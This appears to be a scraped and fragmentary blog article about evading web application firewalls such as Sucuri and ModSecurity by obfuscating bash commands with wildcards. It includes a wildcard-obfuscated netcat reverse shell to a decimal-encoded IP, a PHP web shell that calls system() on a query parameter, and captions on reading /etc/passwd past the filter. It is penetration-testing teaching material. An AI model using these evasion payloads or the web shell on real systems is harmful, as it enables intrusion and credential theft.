A typical kit used by pentesters during a WAPT :)

Web Application Firewall (WAF) Evasion Techniques

I can read your passwd file with: “/???/??t /???/??ss??”. Having fun with Sucuri WAF, ModSecurity, Paranoia Level and more…

theMiddle
theMiddle
Dec 8, 2017 · 9 min read

Things may you don’t know about wildcards

the “ls” help output executed using /???/?s syntax
/bin/cat /etc/passwd executed with wildcards
/???/?c.??????????? -e /???/b??h 2130706433 1337
executing a reverse shell using wildcard
enumerate files and directories using echo command
enumerate files and directories through a WAF

Sucuri WAF evasion

Test evasion technique on Sucuri WAF
<?php
echo 'ok: ';
print_r($_GET['c']);
system($_GET['c']);

ModSecurity OWASP CRS 3.0

Paranoia Level for dummies

# -=[ Targets and ASCII Ranges ]=-
#
# 920270: PL1
# REQUEST_URI, REQUEST_HEADERS, ARGS and ARGS_NAMES
# ASCII: 1-255
# Example: Full ASCII range without null character
#
# 920271: PL2
# REQUEST_URI, REQUEST_HEADERS, ARGS and ARGS_NAMES
# ASCII: 9,10,13,32-126,128-255
# Example: Full visible ASCII range, tab, newline
#
# 920272: PL3
# REQUEST_URI, REQUEST_HEADERS, ARGS, ARGS_NAMES, REQUEST_BODY
# ASCII: 32-36,38-126
# Example: Visible lower ASCII range without percent symbol
#
# 920273: PL4
# ARGS, ARGS_NAMES and REQUEST_BODY
# ASCII: 38,44-46,48-58,61,65-90,95,97-122
# Example: A-Z a-z 0-9 = - _ . , : &
#
# 920274: PL4
# REQUEST_HEADERS without User-Agent, Referer, Cookie
# ASCII: 32,34,38,42-59,61,65-90,95,97-122
# Example: A-Z a-z 0-9 = - _ . , : & " * + / SPACE

Paranoia Level 0 (PL0)

SecAction "id:999,\
phase:1,\
nolog,\
pass,\
t:none,\
setvar:tx.paranoia_level=0"
RCE accepted by ModSecurity with PL0 (don’t panic, it’s ok)

Paranoia Level 1 and 2 (PL1, PL2)

SecAction "id:999,\
phase:1,\
nolog,\
pass,\
t:none,\
setvar:tx.paranoia_level=1"
with PL1 and PL2 my RCE attack was not blocked and I can read /etc/passwd

Paranoia Level 3 (PL3)

Paranoia Level 4 (PL4)

Do you want more?

Final thoughts

From my bookmarks

Contacts

secjuice™

secjuice™ is your daily shot of opinion, analysis & insight…

Medium is an open platform where 170 million readers come to find insightful and dynamic thinking. Here, expert and undiscovered voices alike dive into the heart of any topic and bring new ideas to the surface. Learn more

Follow the writers, publications, and topics that matter to you, and you’ll see them on your homepage and in your inbox. Explore

If you have a story to tell, knowledge to share, or a perspective to offer — welcome home. It’s easy and free to post your thinking on any topic. Write on Medium

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store